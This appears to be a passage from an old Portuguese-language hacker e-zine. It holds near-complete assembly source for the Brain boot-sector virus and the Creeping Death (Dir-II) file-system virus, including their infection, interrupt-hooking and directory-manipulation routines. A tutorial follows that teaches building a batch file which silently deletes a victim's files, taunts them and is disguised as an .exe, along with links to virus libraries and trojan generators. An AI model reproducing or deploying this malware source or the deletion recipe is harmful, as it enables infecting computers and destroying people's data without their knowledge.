jne donecalc mov byte ptr ds:[7C00h+offset cursector],1 mov al,ds:[7C00h+offset curhead] inc al mov ds:[7C00h+offset curhead],al cmp al,2 jne donecalc mov byte ptr ds:[7C00h+offset curhead],0 inc byte ptr ds:[7C00h+offset cursector+1] donecalc: retn ; the following is a collection of garbage bytes db 00h, 00h, 00h, 00h, 32h,0E3h db 23h, 4Dh, 59h,0F4h,0A1h, 82h db 0BCh,0C3h, 12h, 00h, 7Eh, 12h db 0CDh, 21h,0A2h, 3Ch, 5Fh a_data dw 050Ch ; Second part of the virus begins here jmp short entersecondpart db '(c) 1986 Brain & Amjads (pvt) Ltd ',0 readcounter db 4 ; keep track of # reads curdrive db 0 int13flag db 0 entersecondpart: mov cs:readcounter,1Fh xor ax,ax mov ds,ax ; ds -> interrupt table mov ax,ds:[13h*4] mov ds:[6Dh*4],ax mov ax,ds:[13h*4+2] mov ds:[6Dh*4+2],ax mov ax,offset int13 ; 276h mov ds:[13h*4],ax mov ax,cs mov ds:[13h*4+2],ax mov cx,4 ; 4 tries xor ax,ax mov es,ax ; es -> interrupt table tryreadbootsector: push cx mov dh,cs:firsthead mov dl,0 mov cx,cs:firstsector mov ax,201h ; read from default disk mov bx,7C00h int 6Dh ; int 13h jnc readbootOK mov ah,0 int 6Dh ; int 13h pop cx loop tryreadbootsector int 18h ; ROM basic on failure readbootOK: ; return control to ; original boot sector ;* jmp far ptr 0000:7C00h db 0EAh, 00h, 7Ch, 00h, 00h nop ; MASM NOP!!! int13: sti cmp ah,2 ; if not read request, jne doint13 ; do not go further cmp dl,2 ; if after second floppy, ja doint13 ; do not go further cmp ch,0 ; if not reading boot sector, jne regularread ; go handle as usual cmp dh,0 ; if boot sector, je readboot ; do I<-/>/\|> stuff regularread: dec cs:readcounter ; Infect after 4 reads jnz doint13 ; If counter still OK, don't ; do anything else jmp short readboot ; Otherwise, try to infect doint13: jmp exitint13h readboot: ; FINISH THIS! mov cs:int13flag,0 ; clear flag mov cs:readcounter,4 ; reset counter push ax push bx push cx push dx mov cs:curdrive,dl mov cx,4 tryreadbootblock: push cx mov ah,0 ; Reset disk int 6Dh jc errorreadingbootblock ; Try again mov dh,0 mov cx,1 mov bx,offset readbuffer ; buffer @ 6BEh push es mov ax,cs mov es,ax mov ax,201h int 6Dh ; Read boot sector pop es jnc continuestuff ; continue if no error errorreadingbootblock: pop cx loop tryreadbootblock jmp short resetdisk ; too many failures nop continuestuff: pop cx ; get system id in boot block mov ax,word ptr cs:[offset readbuffer+4] cmp ax,1234h ; already infected? jne dodisk ; if not, infect it mov cs:int13flag,1 ; flag prev. infection jmp short noreset dodisk: push ds push es mov ax,cs mov ds,ax mov es,ax push si call writevirus ; infect the disk jc failme ; exit on failure mov cs:int13flag,2 ; flag success call changeroot ; manipulate volume label failme: pop si pop es pop ds jnc noreset ; don't reset on success resetdisk: mov ah,0 ; reset disk int 6Dh ; int 13h noreset: pop dx pop cx pop bx pop ax cmp cx,1 jne exitint13h cmp dh,0 jne exitint13h cmp cs:int13flag,1 ; already infected? jne wasntinfected ; if wasn't, go elsewhere mov cx,word ptr cs:[offset readbuffer+7] mov dx,word ptr cs:[offset readbuffer+5] mov dl,cs:curdrive ; otherwise, read real jmp short exitint13h ; boot sector wasntinfected: cmp cs:int13flag,2 ; successful infection? jne exitint13h ; if not, just do call mov cx,cs:firstsector mov dh,cs:firsthead exitint13h: int 6Dh ; int 13h retf 2 db 15 dup (0) FATManip: ; returns al as error code jmp short delvedeeper nop FATManipreadcounter dw 3 db ' (c) 1986 Brain & Amjads (pvt) Ltd' delvedeeper: call readFAT ; Get FAT ID byte mov ax,word ptr ds:[offset readbuffer] cmp ax,0FFFDh ; is it 360K disk? je is360Kdisk ; continue if so mov al,3 ; al=3 == not good disk stc ; flag error retn ; and exit is360Kdisk: mov cx,37h mov FATManipreadcounter,0 ; none found yet checknextsector: call FATentry12bit ; get entry in FAT cmp ax,0 ; unused? jne notunused inc FATManipreadcounter ; one more found unused cmp FATManipreadcounter,3 ; If need more, jne tryanother ; go there jmp short markembad ; found 3 consecutive nop ; empty sectors notunused: mov FATManipreadcounter,0 ; must start over tryanother: inc cx ; try next sector cmp cx,163h ; end of disk? jne checknextsector ; if not, continue mov al,1 ; al=1 == none empty stc ; Indicate error retn markembad: mov dl,3 ; 3 times markanotherbad: call markbad12bit dec cx dec dl jnz markanotherbad inc cx call calc1sttrack call writeFAT ; update FAT mov al,0 ; al=0 == ok clc ; indicate success retn markbad12bit: push cx push dx mov si,offset readbuffer ; si -> buffer mov al,cl shr al,1 jc low_12 ; low bits call clus2offset12bit mov ax,[bx+si] ; get FAT entry and ax,0F000h ; mark it bad or ax,0FF7h jmp short putitback ; and put it back nop low_12: call clus2offset12bit mov ax,[bx+si] ; get FAT entry and ax,0Fh ; mark it bad or ax,0FF70h putitback: mov [bx+si],ax ; replace FAT entry mov word ptr ds:[400h][bx+si],ax ; in two places pop dx pop cx retn FATentry12bit: push cx mov si,offset readbuffer ; si->buffer mov al,cl shr al,1 ; Part 3 of the virus starts here jc want_high_12 call clus2offset12bit mov ax,[bx+si] and ax,0FFFh jmp short exitFATentry12bit nop want_high_12: call clus2offset12bit ; xxxxxxxxxxxx0000 mov ax,[bx+si] ; ^^^^^^^^^^^^wanted and ax,0FFF0h ; mask wanted bits mov cl,4 ; and move to correct shr ax,cl ; position exitFATentry12bit: pop cx retn clus2offset12bit: push dx mov ax,3 mul cx shr ax,1 ; ax = cx*1.5 mov bx,ax pop dx retn readFAT: mov ah,2 ; read call FAT_IO retn writeFAT: mov ah,3 ; write call FAT_IO retn FAT_IO: mov cx,4 ; try four times FAT_IOLoop: push cx push ax mov ah,0 ; reset disk int 6Dh ; int 13h pop ax jc tryFAT_IOagain mov bx,offset readbuffer mov al,4 ; 4 sectors mov dh,0 ; head 0 mov dl,curdrive mov cx,2 ; sector 2 push ax ; (FAT) int 6Dh ; int 13h pop ax jnc exitFAT_IO tryFAT_IOagain: pop cx loop FAT_IOLoop pop ax pop ax mov al,2 stc ; mark error retn exitFAT_IO: pop cx retn calc1sttrack: push cx sub cx,2 shl cx,1 ; 2 sectors/cluster add cx,0Ch ; start of data area mov ax,cx ; ax = sector mov cl,12h ; 4096 div cl ; ax/4096 = al rem ah mov byte ptr firstsector+1,al mov firsthead,0 inc ah cmp ah,9 ; past track 9? jbe notpasttrack9 ; nope, we are ok sub ah,9 ; otherwise, adjust mov firsthead,1 notpasttrack9: mov byte ptr firstsector,ah pop cx retn db 0, 0, 0, 0, 0, 0 r_or_w_root db 3 entrycount dw 35h tempsave1 dw 303h tempsave2 dw 0EBEh tempsave3 dw 1 tempsave4 dw 100h db 0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh db 8Dh, 98h, 9Fh, 8Eh,0E0h db ' (c) ashar $' changeroot: call readroot ; read in root directory jc donotchangeroot push di call changevolume ; change volume label pop di jc donotchangeroot call writeroot ; write back new root dir donotchangeroot: retn ; The following is just garbage bytes db 0BBh, 9Bh, 04h,0B9h, 0Bh db 0,8Ah,7,0F6h,0D8h,88h,4,46h,43h db 0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h db 0C6h, 06h changevolume: mov entrycount,6Ch mov si,offset readbuffer+40h; 3nd dir entry mov tempsave1,dx mov ax,entrycount ; 6Ch shr ax,1 mov tempsave3,ax ; 36h shr ax,1 mov tempsave2,ax ; 1Bh xchg ax,cx and cl,43h ; cx = 3 mov di,tempsave2 add di,1E3h ; di = 01FE findlabel: mov al,[si] cmp al,0 je dolabel ; no mo entries mov al,[si+0Bh] ; attribute byte and al,8 ; volume label? cmp al,8 ; yes? je dolabel ; then change it! add si,20h ; go to next directory entry dec entrycount jnz findlabel ; loop back stc ; Error! retn db 8Bh dolabel: mov bx,[di] ; offset a_data xor bx,tempsave3 ; bx = 53Ah mov tempsave3,si ; si->direntry cli mov ax,ss mov tempsave1,ax mov tempsave2,sp mov ax,cs mov ss,ax mov sp,tempsave3 add sp,0Ch ;->reserved area mov cl,51h add dx,444Ch mov di,2555h mov cx,0C03h repe cmpsw mov ax,0B46h mov cx,3 rol ax,cl ; ax = 5A30h mov tempsave3,ax mov cx,5 mov dx,8 sub tempsave3,5210h ; 820h push tempsave3 ; store attributes/reserved ; I haven't commented the remainder of this procedure. ; It basically changes the volume label to read "(c) Brain" ; Comment mode OFF dowhatever: mov ah,[bx] ; 5a3h inc bx mov dl,ah shl dl,1 jc dowhatever searchstuff: mov dl,[bx] ; dl=C2h inc bx ; bx=53Eh mov al,dl shl dl,1 jc searchstuff add ax,1D1Dh push ax inc tempsave3 db 73h, 01h ; jnc $+3 db 0EAh,0E2h,0E1h, 8Bh, 26h; jmp 268B:E1E2 xchg bp,ax add al,0A1h xchg bx,ax add al,8Eh sar bl,1 add dh,[bp+si] clc ret ;db 95h, 04h,0A1h, 93h, 04h, 8Eh ;db 0D0h,0FBh, 02h, 32h,0F8h,0C3h ; Comment mode ON readroot: mov r_or_w_root,2 ; set action code jmp short do_rw_root ; easier to do w/ nop ; mov ah, 2 writeroot: mov r_or_w_root,3 jmp short do_rw_root ; this is somewhat useless nop do_rw_root: mov dh,0 ; head 0 mov dl,curdrive mov cx,6 ; sector 6 mov ah,r_or_w_root mov al,4 ; 4 sectors mov bx,offset readbuffer call doint13h jc exit_rw_root ; quit on error mov cx,1 mov dh,1 ; head 1 mov ah,r_or_w_root mov al,3 add bx,800h call doint13h exit_rw_root: retn doint13h: mov tempsave1,ax mov tempsave2,bx mov tempsave3,cx mov tempsave4,dx mov cx,4 doint13hloop: push cx mov ah,0 ; Reset disk int 6Dh jc errordoingint13h mov ax,tempsave1 mov bx,tempsave2 mov cx,tempsave3 mov dx,tempsave4 int 6Dh ; int 13h jnc int13hsuccess errordoingint13h: pop cx loop doint13hloop stc ; indicate error retn int13hsuccess: pop cx retn db 0, 0, 0 ; Part 4 of the virus starts here tempstorecx dw 3 readwritecurrentdata dw 301h writevirus: call FATManip jc exitwritevirus mov cursector,1 mov curhead,0 mov bx,offset readbuffer call readcurrent mov bx,offset readbuffer mov ax,firstsector mov cursector,ax mov ah,firsthead mov curhead,ah call writecurrent call calcnextsector mov cx,5 mov bx,200h writeanothersector: mov tempstorecx,cx call writecurrent call calcnextsector add bx,200h mov cx,tempstorecx loop writeanothersector mov curhead,0 mov cursector,1 mov bx,0 call writecurrent clc ; indicate success exitwritevirus: retn readcurrent: mov readwritecurrentdata,201h jmp short doreadwrite nop writecurrent: mov readwritecurrentdata,301h jmp short doreadwrite ; This is pointless. nop doreadwrite: push bx mov cx,4 tryreadwriteagain: push cx mov dh,curhead mov dl,curdrive mov cx,cursector mov ax,readwritecurrentdata ; read or write? int 6Dh ; int 13h jnc readwritesuccessful mov ah,0 ; reset disk int 6Dh ; int 13h pop cx loop tryreadwriteagain pop bx pop bx stc ; Indicate error retn readwritesuccessful: pop cx pop bx retn calcnextsector: inc byte ptr cursector ; next sector cmp byte ptr cursector,0Ah jne donecalculate ; finished calculations mov byte ptr cursector,1 ; clear sector # inc curhead ; and go to next head cmp curhead,2 ; if not too large, jne donecalculate ; we are done mov curhead,0 ; otherwise clear head # inc byte ptr cursector+1 ; and advance cylinder donecalculate: retn db 64h, 74h, 61h ; read buffer starts here ; insert your favorite boot block below... readbuffer: brain ends end -------------------------------------------------Corta ------------------------------------------------------------------------------ -------------------------------------------------Corta ; Creeping Death V 1.0 ; ; (C) Copyright 1991 by VirusSoft Corp. i13org = 5f8h i21org = 5fch dir_2 segment byte public assume cs:dir_2, ds:dir_2 org 100h start: mov sp,600h ; Set up the stack pointer inc word ptr counter ; Generation counter xor cx,cx mov ds,cx ; DS points to interrupt table lds ax, ds:[0c1h] ; Find interrupt 30h add ax,21h ; Change it to Int 21h push ds ; Save it on stack for use by push ax ; subroutine "jump" mov ah,30h ; Get DOS version call jump cmp al,4 ; DOS 4.X+ : SI = 0 sbb si,si ; DOS 2/3 : SI = -1 mov byte ptr [drive+2],byte ptr -1 ; Initialise last drive to ; "never accessed" mov bx,60h ; Adjust memory in ES to mov ah,4ah ; BX paragraphs. call jump mov ah,52h ; Get DOS List of Lists call jump ; to ES:BX push es:[bx-2] ; Save Segment of first MCB lds bx,es:[bx] ; DS:BX -> 1st DPB ; (Drive parameter block) search: mov ax,[bx+si+15h] ; Get segment of device driver cmp ax,70h ; Is it CONFIG? (I think) jne next ; If not, try again xchg ax,cx ; Move driver segment to CX mov [bx+si+18h],byte ptr -1 ; Flag block must be rebuilt mov di,[bx+si+13h] ; Save offset of device driver ; Original device driver ; address in CX:DI mov [bx+si+13h],offset header ; Replace with our own mov [bx+si+15h],cs ; (header) next: lds bx,[bx+si+19h] ; Get next device block cmp bx,-1 ; Is it the last one? jne search ; If not, search it jcxz install pop ds ; Restore segment of first mov ax,ds ; MCB add ax,ds:[3] ; Go to next MCB inc ax ; AX = segment next MCB mov dx,cs ; DX = MCB owning current dec dx ; program cmp ax,dx ; Are these the same? jne no_boot ; If not, we are not currently ; in the middle of a reboot add word ptr ds:[3],61h ; Increase length owned by ; MCB by 1552 bytes no_boot: mov ds,dx ; DS = MCB owning current ; program mov word ptr ds:[1],8 ; Set owner = DOS mov ds,cx ; DS = segment of original ; device driver les ax,[di+6] ; ES = offset int handler ; AX = offset strategy entry mov word ptr cs:str_block,ax ; Save entry point mov word ptr cs:int_block,es ; And int block for use in ; function _in cld ; Scan for the write mov si,1 ; function in the scan: dec si ; original device driver lodsw cmp ax,1effh jne scan mov ax,2cah ; Wicked un-yar place o' cmp [si+4],ax ; doom. je right cmp [si+5],ax jne scan right: lodsw push cs pop es mov di,offset modify+1 ; Save address of patch stosw ; area so it can be changed xchg ax,si ; later. mov di,offset i13org ; This is in the stack, but cli ; it is used by "i13pr" movsw movsw mov dx,0c000h ; Scan for hard disk ROM ; Start search @ segment C000h fdsk1: mov ds,dx ; Load up the segment xor si,si ; atart at offset 0000h lodsw ; Scan for the signature cmp ax,0aa55h ; Is it the signature? jne fdsk4 ; If not, change segment cbw ; clear AH lodsb ; load a byte to AL mov cl,9 sal ax,cl ; Shift left, 0 filled fdsk2: cmp [si],6c7h jne fdsk3 cmp word ptr [si+2],4ch jne fdsk3 push dx ; Save the segment push [si+4] ; and offset on stack jmp short death ; for use by i13pr install: int 20h file: db "c:",255,0 fdsk3: inc si ; Increment search offset cmp si,ax ; If we are not too high, jb fdsk2 ; try again fdsk4: inc dx ; Increment search segment cmp dh,0f0h ; If we are not in high jb fdsk1 ; memory, try again sub sp,4 ; effectively push dummy vars. death: push cs ; on stack for use by i13pr pop ds mov bx,ds:[2ch] ; Get environment from PSP mov es,bx mov ah,49h ; Release it (to save memory) call jump xor ax,ax test bx,bx ; Is BX = 0? jz boot ; If so, we are booting now mov di,1 ; and not running a file seek: dec di ; Search for end of scasw ; the environment block jne seek lea si,[di+2] ; SI points to filename jmp short exec ; (in DOS 3.X+) ; Execute that file boot: mov es,ds:[16h] ; get PSP of parent mov bx,es:[16h] ; get PSP of parent dec bx ; go to its MCB xor si,si exec: push bx mov bx,offset param ; Set up parameter block ; for EXEC function mov [bx+4],cs ; segment to command line mov [bx+8],cs ; segment to 1st FCB mov [bx+12],cs ; segment to 2nd FCB pop ds push cs pop es mov di,offset f_name push di ; Save filename offset mov cx,40 ; Copy the filename to rep movsw ; the buffer push cs pop ds mov ah,3dh ; Handle open file mov dx,offset file ; "c: ",0 call jump pop dx ; DS:DX -> filename mov ax,4b00h ; Load and Execute call jump ; ES:BX = param block mov ah,4dh ; Get errorlevel call jump mov ah,4ch ; Terminate jump: pushf ; Simulate an interrupt 21h call dword ptr cs:[i21org] ret ;--------Installation complete i13pr: mov ah,3 ; Write AL sectors from ES:BX jmp dword ptr cs:[i13org] ; to track CH, sector CL, ; head DH, drive DL main: push ax ; driver push cx ; strategy block push dx push ds push si push di push es ; Move segment of parameter pop ds ; block to DS mov al,[bx+2] ; [bx+2] holds command code cmp al,4 ; Input (read) je input cmp al,8 ; Output (write) je output cmp al,9 ; Output (write) with verify je output call in_ ; Call original device cmp al,2 ; Request build BPB jne ppp ; If none of the above, exit lds si,[bx+12h] ; DS:SI point to BPB table mov di,offset bpb_buf ; Replace old pointer with mov es:[bx+12h],di ; a pointer to our own mov es:[bx+14h],cs ; BPB table push es ; Save segment of parameters push cs pop es mov cx,16 ; Copy the old BPB table to rep movsw ; our own pop es ; Restore parameter segment push cs pop ds mov al,[di+2-32] ; AL = sectors per allocation cmp al,2 ; unit. If less than adc al,0 ; 2, increment cbw ; Extend sign to AH (clear AH) cmp word ptr [di+8-32],0 ; Is total number sectors = 0? je m32 ; If so, big partition (>32MB) sub [di+8-32],ax ; Decrease space of disk by ; one allocation unit(cluster) jmp short ppp ; Exit m32: sub [di+15h-32],ax ; Handle large partitions sbb word ptr [di+17h-32],0 ppp: pop di pop si pop ds pop dx pop cx pop ax rts: retf ; We are outta here! output: mov cx,0ff09h call check ; is it a new disk? jz inf_sec ; If not, go away call in_ ; Call original device handler jmp short inf_dsk inf_sec: jmp _inf_sec read: jmp _read read_: add sp,16 ; Restore the stack jmp short ppp ; Leave device driver input: call check ; Is it a new disk? jz read ; If not, leave inf_dsk: mov byte ptr [bx+2],4 ; Set command code to READ cld lea si,[bx+0eh] ; Load from buffer address mov cx,8 ; Save device driver request save: lodsw ; on the stack push ax loop save mov word ptr [bx+14h],1 ; Starting sector number = 1 ; (Read 1st FAT) call driver ; Read one sector jnz read_ ; If error, exit mov byte ptr [bx+2],2 ; Otherwise build BPB call in_ ; Have original driver do the ; work lds si,[bx+12h] ; DS:SI points to BPB table mov ax,[si+6] ; Number root directory entries add ax,15 ; Round up mov cl,4 shr ax,cl ; Divide by 16 to find sectors ; of root directory mov di,[si+0bh] ; DI = sectors/FAT add di,di ; Double for 2 FATs stc ; Add one for boot record adc di,ax ; Add sector size of root dir push di ; to find starting sector of ; data (and read) cwd ; Clear DX mov ax,[si+8] ; AX = total sectors test ax,ax ; If it is zero, then we have jnz more ; an extended partition(>32MB) mov ax,[si+15h] ; Load DX:AX with total number mov dx,[si+17h] ; of sectors more: xor cx,cx sub ax,di ; Calculate FAT entry for last ; sector of disk sbb dx,cx mov cl,[si+2] ; CL = sectors/cluster div cx ; AX = cluster # cmp cl,2 ; If there is more than 1 sbb ax,-1 ; cluster/sector, add one push ax ; Save cluster number call convert ; AX = sector number to read ; DX = offset in sector AX ; of FAT entry ; DI = mask for EOF marker mov byte ptr es:[bx+2],4 ; INPUT (read) mov es:[bx+14h],ax ; Starting sector = AX call driver ; One sector only again: lds si,es:[bx+0eh] ; DS:SI = buffer address add si,dx ; Go to FAT entry sub dh,cl ; Calculate a new encryption adc dx,ax ; value mov word ptr cs:gad+1,dx ; Change the encryption value cmp cl,1 ; If there is 0 cluster/sector je small_ ; then jump to "small_" mov ax,[si] ; Load AX with offset of FAT ; entry and ax,di ; Mask it with value from ; "convert" then test to see ; if the sector is fine cmp ax,0fff7h ; 16 bit reserved/bad je bad cmp ax,0ff7h ; 12 bit reserved/bad je bad cmp ax,0ff70h ; 12 bit reserved/bad jne ok bad: pop ax ; Tried to replicate on a bad dec ax ; cluster. Try again on a push ax ; lower one. call convert ; Find where it is in the FAT jmp short again ; and try once more small_: not di ; Reverse mask bits and [si],di ; Clear other bits pop ax ; AX = cluster number push ax inc ax ; Need to do 2 consecutive push ax ; bytes mov dx,0fh test di,dx jz here inc dx ; Multiply by 16 mul dx here: or [si],ax ; Set cluster to next pop ax ; Restore cluster of write call convert ; Calculate buffer offset mov si,es:[bx+0eh] ; Go to FAT entry (in buffer) add si,dx mov ax,[si] and ax,di ok: mov dx,di ; DI = mask from "convert" dec dx and dx,di ; Yerg! not di and [si],di or [si],dx ; Set [si] to DI cmp ax,dx ; Did we change the FAT? pop ax ; i.e. Are we already on this pop di ; disk? mov word ptr cs:pointer+1,ax ; Our own starting cluster je _read_ ; If we didn't infect, then ; leave the routine. Oh ; welp-o. mov dx,[si] push ds push si call write ; Update the FAT pop si pop ds jnz _read_ ; Quit if there's an error call driver cmp [si],dx jne _read_ dec ax dec ax mul cx ; Multiply by sectors/cluster ; to find the sector of the ; write add ax,di adc dx,0 push es pop ds mov word ptr [bx+12h],2 ; Byte/sector count mov [bx+14h],ax ; Starting sector # test dx,dx jz less mov word ptr [bx+14h],-1 ; Flag extended partition mov [bx+1ah],ax ; Handle the sector of the mov [bx+1ch],dx ; extended partition less: mov [bx+10h],cs ; Transfer address segment mov [bx+0eh],100h ; and the offset (duh) call write ; Zopy ourselves! ; (We want to travel) _read_: std lea di,[bx+1ch] ; Restore device driver header mov cx,8 ; from the stack load: pop ax stosw loop load _read: call in_ ; Call original device handler mov cx,9 _inf_sec: mov di,es:[bx+12h] ; Bytes/Sector lds si,es:[bx+0eh] ; DS:SI = pointer to buffer sal di,cl ; Multiply by 512 ; DI = byte count xor cl,cl add di,si ; Go to address in the buffer xor dl,dl ; Flag for an infection in ; function find push ds push si call find ; Infect the directory jcxz no_inf call write ; Write it back to the disk and es:[bx+4],byte ptr 07fh ; Clear error bit in status ; word no_inf: pop si pop ds inc dx ; Flag for a decryption in ; function find call find ; Return right information to ; calling program jmp ppp ;--------Subroutines find: mov ax,[si+8] ; Check filename extension cmp ax,"XE" ; in directory structure jne com cmp [si+10],al je found com: cmp ax,"OC" jne go_on cmp byte ptr [si+10],"M" jne go_on found: test [si+1eh],0ffc0h ; >4MB ; Check file size high word jnz go_on ; to see if it is too big test [si+1dh],03ff8h ; <2048B ; Check file size low word jz go_on ; to see if it is too small test [si+0bh],byte ptr 1ch ; Check attribute for subdir, jnz go_on ; volume label or system file test dl,dl ; If none of these, check DX jnz rest ; If not 0, decrypt pointer: mov ax,1234h ; mov ax, XX modified elsewhere cmp ax,[si+1ah] ; Check for same starting ; cluster number as us je go_on ; If it is, then try another xchg ax,[si+1ah] ; Otherwise make it point to ; us. gad: xor ax,1234h ; Encrypt their starting ; cluster mov [si+14h],ax ; And put it in area reserved ; by DOS for no purpose loop go_on ; Try another file rest: xor ax,ax ; Disinfect the file xchg ax,[si+14h] ; Get starting cluster xor ax,word ptr cs:gad+1 ; Decrypt the starting cluster mov [si+1ah],ax ; and put it back go_on: db 2eh,0d1h,6 ; rol cs:[gad+1], 1 dw offset gad+1 ; Change encryption and add si,32 ; go to next file cmp di,si ; If it is not past the end of jne find ; the buffer, then try again ret ; Otherwise quit check: mov ah,[bx+1] ; ah = unit code (block device ; only) drive: cmp ah,-1 ; cmp ah, XX can change. ; Compare with the last call ; -1 is just a dummy ; impossible value that will ; force the change to be true mov byte ptr cs:[drive+2],ah ; Save this call's drive jne changed ; If not the same as last call ; media has changed push [bx+0eh] ; If it is the same physical ; drive, see if floppy has ; been changed mov byte ptr [bx+2],1 ; Tell original driver to do a call in_ ; media check (block only) cmp byte ptr [bx+0eh],1 ; Returns 1 in [bx+0eh] if pop [bx+0eh] ; media has not been changed mov [bx+2],al ; Restore command code changed: ret ; CF,ZF set if media has not ; been changed, not set if ; has been changed or we don't ; know write: cmp byte ptr es:[bx+2],8 ; If we want OUTPUT, go to jae in_ ; original device handler ; and return to caller mov byte ptr es:[bx+2],4 ; Otherwise, request INPUT mov si,70h mov ds,si ; DS = our segment modify: mov si,1234h ; Address is changed elsewhere push [si] push [si+2] mov [si],offset i13pr mov [si+2],cs call in_ ; Call original device handler pop [si+2] pop [si] ret driver: mov word ptr es:[bx+12h],1 ; One sector in_: ; in_ first calls the strategy ; of the original device ; driver and then calls the ; interrupt handler db 09ah ; CALL FAR PTR str_block: dw ?,70h ; address db 09ah ; CALL FAR PTR int_block: dw ?,70h ; address test es:[bx+4],byte ptr 80h ; Was there an error? ret convert: cmp ax,0ff0h ; 0FFF0h if 12 bit FAT jae fat_16 ; 0FF0h = reserved cluster mov si,3 ; 12 bit FAT xor word ptr cs:[si+gad-1],si ; Change the encryption value mul si ; Multiply by 3 and shr ax,1 ; divide by 2 mov di,0fffh ; Mark it EOF (low 12 bits) jnc cont ; if it is even, continue mov di,0fff0h ; otherwise, mark it EOF (high jmp short cont ; 12 bits) and then continue fat_16: mov si,2 ; 16 bit FAT mul si ; Double cluster # mov di,0ffffh ; Mark it as end of file cont: mov si,512 div si ; AX = sector number ; (relative to start of FAT) ; DX = offset in sector AX header: inc ax ; Increment AX to account for ret ; boot record counter: dw 0 dw 842h ; Attribute ; Block device ; DOS 3 OPEN/CLOSE removable ; media calls supported ; Generic IOCTL call supported ; Supports 32 bit sectors dw offset main ; Strategy routine dw offset rts ; Interrupt routine (rtf) db 7fh ; Number of subunits supported ; by this driver. Wow, lookit ; it -- it's so large and juicy ; Parameter block format: ; 0 WORD Segment of environment ; 2 DWORD pointer to command line ; 6 DWORD pointer to 1st default FCB ;10 DWORD pointer to 2nd default FCB param: dw 0,80h,?,5ch,?,6ch,? bpb_buf: db 32 dup(?) f_name: db 80 dup(?) ;--------The End. dir_2 ends end start MsDos ---------------------------------------Corta ------------------------------------------------------------------------------- A base do processo virotico. >>Dead POOL Este texto foi escrito para que você tenha uma pequena intoduçao ao vírus toda sua base na verdade este processo é o que se conhece de mais banal e inbecil na construçao de vírus. Embora eu nao recomende vírus e nem goste pelo grau de babaquice que na minha opiniao ele representa, mas é interessantissimo saber de vírus pois quanto mais conhecimento melhor. Nossa principal intençao é divulgar novas informaçoes e abrir novos horizontes. E bem simples. Se voce ja sabe dos comandos do DOS vai ajudar muito. Entao abre o notepad. Ou entao usa o editor do DOS, se nao quiser usa qualquer editor de texto que você tiver. (* todas as linhas que estiverem marcadas com esse sinal e uma explicaçao) ECHO OFF * Esta linha faz com que a vitima nao veja o que o arquivo batch está fazendo. CD\ * Isto trás o virus para o dos e para o drive que você quer ferrar. ECHO Y | del c:\exemplo\*.* * Isso vai deletar todos os arquivos contidos no diretorio exemplo. Nao vai deletar nenhum sub diretorio. Se você quer deletar os sub diretorios tambem ai você vai ter que usar essa linha aqui: ECHO Y | del c:\exemplo\sub\*.* * Agora isso vai deletar todos os arquivos no diretorio exemplo \sub. Ja percebeu quantos arquivos voce pode deletar?? Se voce quiser deletar o netcape, você deve usar essa linha : ECHO Y | del c:\netscape\*.* * Sacou??? Agora vem a parte mais divertida!! Você pode incluir um texto sacaneando o cara. Se você quiser fazer isso deve incluir essa linha : ECHO Se fudeu lammer otário!!! Teu netscape foi pras picas!!!! * E isso que vai aparecer no DOS e o cara nem vai ter idéia do que você ta falando. * Agora salva o arquivo como .bat. Tipo virus.bat ou teste.bat, sei lá grave com o nome que você quiser, mas grave com a extençao .bat Ai tu vai precisar de um programa que tranforme arquivos .bat pra .exe Nem sei onde você pode pegar. Entao começa a catar por ai. Quando tiver o prog na mao muda de .bat pra .exe álias esta porra deste programa para passar de bat para exe é o compilador de q-basic para achar uma porra destas eu nem sei mais se existe na rede ou se é usado o que provavelmente nao é entao se vira. VIRUS, VIRUS, VIRUS Estava eu Draco passeando pelos recantos da net quando me certifiquei IEXPLORE é uma BOSTA VIVA ao NETSCAPE!!!!!!!! E tb eu arranjei uma excelente biblioteca de vírus em: www.ctv.es/user/blanca/virus/virus.htm Excelente page com muitos vírus para iniciantes. <><><><><><><><><><><><><> 9>>>%%&&#VaLe A pEnA ViSiTAr#&&%%<<<9 ---------------------------------------------------------------------------- |**************************************************************************| |* Endereço oficial da página HACKER de Soul Spy excelente para experts *| |* burros, iniciantes qualquer nível apresentando textos desde o básico *| |* até avançados, boas para qualquer nível com vários textos em portugues*| |* explicativos e e-zines em: *| |* *| |* http://www.geocities.com/SiliconValley/9808 *| |**************************************************************************| ---------------------------------------------------------------------------- --------------------------------------------------- | Blastor | |Contem uma boa biblioteca crackers e e-zines para| |iniciantes em básico mas para begginers é muito | |bom em: | | www.terravista.ciclone.com.br/ipanema/1460 | --------------------------------------------------- ------------------------------- | Page Anti HAcker legalzinha | | mas um bom ponto de partida | | para se conhecer melhor | |este mundo de bichos escrotos| |em: | | www.netgate.com.br/~hacker | ------------------------------- ----------------- |Sem comentarios| | em: | |www.axur05.org | ----------------- ------------------------------------ |Se vc esta necessitado este site é| |excelente em: | | www.heavengate.com | ------------------------------------ ---------------- | Nesta eu fiz | | faculdade em:| |www.phrack.com| ---------------- ----------------- |Esta nao pode | |faltar a melhor| | www.2600.com | ----------------- ------------------------------------------------------- |Page do read e do DEAD contem uma razoavel biblioteca| |de crackers vários txt e é o ponto de partida da FW | |na net em: | |www.geocities.com/ResearchTriangle/lab/5408/main.html| ------------------------------------------------------- >>>%%&&#VaLe A pEnA ChATeAr#&&%%<<< irc.sti.com.br canal #hack&hack Canal #hack <><><><><><><><><><><><><> 10=-=-=--TroJaN--=-=-=10 Excelente gerador de TROJANS em: www.ctv.es/users/blanca/virus/virus.htm Eu recebi muitos e-mails de o que na verdade eram trojans ou deixou de ser e qual seu real funcionamento. Trojan é uma espécie de um vírus mas que nao possui os mesmos efeitos nossivos mas na sua base é a mesma. O processo de infecçao o formato é tudo muito igual mas com a diferença de que ele nao fode nada apenas ou seja APENAS ou melhor ApEnAs grava a senha ou algo mais. Espero eu nao precisar mais tocar no papo de TROJANS aqui na FW pois na proxima ediçao teremos mais matérias tecnicas e nada muito de receita pronta. Esperamos que nos compreenda mas será com certeza para o bem de vc's. Ate lá e alias esta seçao vai ser substituida por uma de encri e descriptaçao de DADOS. <><><><><><><><><><><><><> 11<^..^>FTP<^..^>11 Muitos boiolas me perguntaram "o moço da FW me fala onde tem uma busca por FTP pu favo" cacete parece que vc's nao conhecem a merda' da net mas eu vou colocar aqui as linhas de comando da busca por FTP. Vc vai salvar estas linhas como um arquivo HTML em seguida rodar ou abrilo pelo browser e terao sua propria busca pelo FTP. Detalhe pq com certeza tem alguem que vai esquecer SE CONECTA NA REDE PARA FAZER A BUSCA!!!!!!!!!!!!!!!!!! 